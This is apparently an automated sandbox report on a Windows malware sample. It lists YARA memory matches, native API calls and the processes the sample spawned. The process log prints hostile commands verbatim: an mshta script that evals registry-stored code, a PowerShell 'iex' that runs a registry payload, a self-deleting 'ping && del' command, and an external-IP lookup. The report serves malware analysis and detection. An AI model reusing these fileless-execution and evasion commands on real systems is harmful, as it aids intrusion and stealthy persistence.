Source: Yara match | File source: 00000001.00000003.346992994.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.470344123.0000019283CFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.346913060.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.346959210.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.393561682.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.470416352.0000019283CFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000002.848361945.00000163C5B02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001D.00000002.844738201.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702016813.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.397469002.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702206900.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000002.703676134.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.701957024.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000002.838458423.0000027741E02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.347006812.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.347017616.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000002.553064845.0000019283CFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702145483.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000003.549734741.0000023D83CEC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: 2GEg45PlG9.exe PID: 6540, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4768, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 6576, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6500, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.25594a0.11.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.2a1a4a0.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.2ac4ef0.3.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.2a994a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.2a1a4a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.2.2GEg45PlG9.exe.20d0000.2.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.25594a0.11.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.2ac4ef0.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000023.00000000.640272876.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.665585940.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.607122164.00000163C5160000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.397282239.0000000002A99000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000002.517379497.0000000002720000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000000.645879141.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000000.651725640.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000000.465481306.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001D.00000000.566373017.000001B920020000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000000.469185979.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000000.547994492.0000023D83620000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001D.00000000.560669492.000001B920020000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000000E.00000002.585352410.000002E0BE597000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.516035040.0000000002559000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.613095849.00000163C5160000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.663821435.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000000.546791184.0000023D83620000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.618879777.00000163C5160000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001D.00000000.555920972.000001B920020000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000000.544941434.0000023D83620000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.397218720.0000000002A1A000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.661999238.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000000.466675811.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_020D836E |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_020D7FBE |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_020DAFC0 |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_0079B006 |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_007913FA |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_007A2D8C |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BE59E4 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BE7548 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BCC3E4 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BC9098 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BC5420 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BD4818 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BDC400 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BC847C |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BE0468 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BE8448 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BD1C44 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BC29B0 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BE91B0 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BC65A8 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BDB1D0 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BD0DC8 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BDCDC4 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BD993C |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BD8974 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BE3D68 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BCAAB4 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BD5AB4 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BE9AA8 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BD2A90 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BDDEE8 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BD52D0 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BC1638 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BC5A1C |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BD220C |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BD77A0 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BCCFF8 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BC9FC4 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BE137C |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BC3764 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BE1B4C |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D836459E4 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D83647548 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D8363220C |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D83625A1C |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D8363CDC4 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D83630DC8 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D8363B1D0 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D836265A8 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D836229B0 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D836491B0 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D83632A90 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D83621638 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D83643D68 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D83638974 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D8363993C |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D8363C400 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D83634818 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D8362C3E4 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D8362CFF8 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D83629FC4 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D836377A0 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D83629098 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D83640468 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D8362847C |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D83631C44 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D83648448 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D83625420 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D8363DEE8 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D836352D0 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D83649AA8 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D83635AB4 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D8362AAB4 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D83623764 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D8364137C |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D83641B4C |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D8365B5A4 |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_0091B006 |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_009113FA |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_00922D8C |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_00401703 NtMapViewOfSection,VirtualAlloc, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_00401C90 GetProcAddress,NtCreateSection,memset, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_004019A0 NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,GetLastError,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_020D9A0F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_020D9E79 NtMapViewOfSection, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_020D5CD1 GetProcAddress,NtCreateSection,memset, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_020DB1E5 NtQueryVirtualMemory, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_00591BF0 NtQuerySystemInformation,Sleep,CreateThread,QueueUserAPC,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_00795021 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_00790179 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_0078B156 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_007941CB memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_007992D7 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_00790BF5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_007944DF NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_007A051D GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_0078EED0 NtMapViewOfSection, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_0078E683 HeapFree,memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_0079C779 GetProcAddress,NtCreateSection,memset, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_007907E8 NtQueryInformationProcess, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_0079C864 NtQuerySystemInformation,RtlNtStatusToDosError, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_007A017E VirtualAlloc,VirtualAlloc,GetLastError,GetLastError,SwitchToThread,GetLastError,GetLastError,RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlExitUserThread,GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_00782357 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_0078B347 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_0079FBD1 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_00790465 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_0078840D NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_00796C90 NtGetContextThread,RtlNtStatusToDosError, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_0078A63D memset,NtQueryInformationProcess, |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BDB080 NtMapViewOfSection, |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BE70F8 NtCreateSection, |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BD74E0 RtlAllocateHeap,NtQueryInformationProcess, |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BD8078 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BD8844 NtWriteVirtualMemory, |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BD3104 NtAllocateVirtualMemory, |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BCB964 NtReadVirtualMemory, |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BDB164 NtQueryInformationProcess, |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BE4200 NtQueryInformationToken,NtQueryInformationToken,NtClose, |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BCC3E4 NtSetContextThread,NtUnmapViewOfSection,NtClose, |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00BFB029 NtProtectVirtualMemory,NtProtectVirtualMemory, |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D83644200 NtQueryInformationToken,NtQueryInformationToken,NtClose, |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D8363B164 NtQueryInformationProcess, |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_0000023D8365B00B NtProtectVirtualMemory,NtProtectVirtualMemory, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_00915021 memset,CreateMutexA,CloseHandle,GetUserNameA,RtlAllocateHeap,NtQueryInformationProcess,OpenProcess,CloseHandle,memcpy,RtlAllocateHeap,OpenEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_00910BF5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_0092051D GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_009107E8 NtQueryInformationProcess, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_0091C864 NtQuerySystemInformation,RtlNtStatusToDosError, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_0092017E VirtualAlloc,VirtualAlloc,GetLastError,GetLastError,SwitchToThread,GetLastError,GetLastError,RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlExitUserThread,GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_0091FBD1 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_0090B347 OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_0090A63D memset,NtQueryInformationProcess, |
Source: unknown | Process created: C:\Users\user\Desktop\2GEg45PlG9.exe "C:\Users\user\Desktop\2GEg45PlG9.exe" |
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>J2ut='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(J2ut).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> |
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a4dqpwui.cmdline |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBB1D.tmp" "c:\Users\user\AppData\Local\Temp\CSC8C8ABE1FEF4C478388BEE18242C93FA2.TMP" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3kd1hp5.cmdline |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE1B0.tmp" "c:\Users\user\AppData\Local\Temp\CSCB9FFCE128DE8401581818FC38CDBD6E1.TMP" |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\2GEg45PlG9.exe |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 |
Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\A402.bi1" |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\A402.bi1" |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, , |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a4dqpwui.cmdline |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3kd1hp5.cmdline |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBB1D.tmp" "c:\Users\user\AppData\Local\Temp\CSC8C8ABE1FEF4C478388BEE18242C93FA2.TMP" |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE1B0.tmp" "c:\Users\user\AppData\Local\Temp\CSCB9FFCE128DE8401581818FC38CDBD6E1.TMP" |
Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\2GEg45PlG9.exe |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\A402.bi1" |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\A402.bi1" |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, , |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com |
Source: Yara match | File source: 0000000E.00000003.473205364.000002E0C721C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.347025160.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000002.551762255.0000023D83CEC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000002.841098267.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.399143772.000000000291C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.346977655.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000003.549603745.0000023D83CEC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702102398.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702289385.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702177373.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.346937674.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
